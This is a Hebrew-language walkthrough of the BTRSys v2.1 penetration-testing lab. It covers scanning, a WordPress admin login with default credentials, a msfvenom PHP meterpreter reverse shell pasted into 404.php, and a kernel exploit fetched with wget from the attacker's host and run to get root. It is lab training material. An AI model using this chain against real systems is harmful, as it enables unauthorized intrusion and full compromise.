כל הזכויות שמורות לטל בן שושן – Shushan.co.il
במדריך זה נעבור על מכונה לביצוע Pentest בשם BTRSys: v2.1
את ההורדה של המכונה יש להוריד מהקישור הבא
יש לטעון את המכונה ע"י vMware Workstation
המכונה מקבלת DHCP מכרטיס הרשת החיצוני שלכם.
דרישות
- Kali
- BTRSys: v2.1
כעת כשהמכונות דלוקות, נכנס לKali ונקיש את הפקודה
Netdiscover יבצע סריקה של רשת 192.168.31.0 על מנת לאתר מכונות שרצות

נמצא כי כתובת המחשב היא 192.168.31.56 ולכן נבצע סריקת Nmap

נוכל להבחין שיש שירות Http בפורט 80, נבצע סריקה בNikto

נבחין שיש קובץ Robots.txt, בקובץ זה לרוב בעלי אתרים רושמים איזה תיקיות או קבצים גוגל לא יסרוק
נכנס לאתר ונגיע לקובץ ה Robots.txt

נבחין שיש תיקייה בשם WordPress, מצויין נכנס לאתר
וננסה לגשת לפאנל הניהול, אם יצא לכם להתקין וורדפרס ואם לא אז זה חשוב לבצע תרגול שכזה
ננסה להיכנס לפאנל Admin, בקישור
http://192.168.31.56/wordpress/wp-admin

ננסה את המשתמש admin admin או כל סיסמא קלה, אם לא הצלחתם השתמשו ב wpscan על מנת לבצע Brute Force
בגלל שמעבדה זו קלה, ננסה admin admin והופ אנחנו בפנים

ננסה לעלות Plugin שהוא למעשה יצור לנו Reverse Shell, נוריד אותו מהאתר

בפאנל הניהול של המשתמש ננסה להעלות את הפלאגין

קיבלנו שגיאה וזה מצויין, הסיבה שאני מציג את זה למרות שלא נוכל להשתמש בטכניקה זו, היא שאתם תוכלו תמיד לחשוב על טכניקות חדשות שבהן ננסה "לפרוץ" את השרת
אם כך ננסה שיטה אחרת שבה נעלה קובץ PHP "זדוני" שיתן לנו גישת PHP Meterpreter
תחילה נכנס לAppearance ואז ל Edior ונערוך את קובץ 404

כעת ניצור קובץ PHP כזה, נקיש את הפקודה
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.31.132 lport=1234 -f raw
כמובן שאת כתובת ה IP יש לשנות לכתובת של הקאלי שלכם
וכעת את הקוד PHP שהוא יצר נעתיק

נדביק ב404.php

כעת נפתח
msfconsole
ונקיש את הפקודות הבאות על מנת ליצור Handler שיאזין ב Reverse Shell

כעת נפעיל את הקובץ הזדוני שהכנו ב404.php
נכנס לכתובת
192.168.31.56/wordpress/wp-content/themes/twentyfourteen/404.php

כעת תפתח גישה, נבדוק מה גירסת המערכת, נוכל גם להשתמש ב LinEnum בשביל לבדוק אם יש חולשות נוספות

זה נראה כמו גרסה בעייתית, נבדוק אם יש Exploit ידוע, נרשום בגוגל
linux kernel 4.4.0 exploit ubuntu
והראשון הוא הExploit הבא

נבדוק אם ה Exploit קיים אצלנו במאגר של Metasploit
searchploit Linux | grep -i ubuntu | grep 4.4.0
נבחין בשורה השלישית

נקיש את הפקודות הבאות
locate 41458.c
כעת נבצע Compile
cd /var/www/html
נחזור כעת לMetasploit ונקיש
shell
כעת נבצע הורדה של "ה Exploit"
כמובן שכתובת האתר היא של הקאלי, שם ה Exoloit נמצא
wget http://192.168.31.132/41458Exploit
נקיש
chmod 777 41458Exploit
ועל מנת להפעיל את ה Exploit
./41458Exploit
אתם תקבלו שגיאה, כמו בתמונה

אבל זה לא אומר שזה לא עבד! השגנו Root
